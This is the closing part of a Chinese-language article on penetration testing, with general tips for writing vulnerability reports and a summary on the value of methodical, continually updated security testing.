- 清晰表达:使用清晰、专业的语言
- 技术细节:提供足够的技术细节
- 修复建议:提供具体、可行的修复建议
- 优先级排序:按风险等级排序漏洞
总结
渗透测试是评估系统安全性的重要手段,需要系统性的方法论、专业的技能和合适的工具。通过遵循标准化的测试流程,使用自动化工具辅助手工测试,并生成高质量的报告,可以有效地发现和修复安全漏洞,提高系统的整体安全水平。
渗透测试不仅是技术活动,更是一个需要持续学习和改进的过程。测试人员应该不断更新知识和技能,关注最新的攻击技术和防护方法,以应对不断演变的安全威胁。
> 评论区域 (1 条)_
发表评论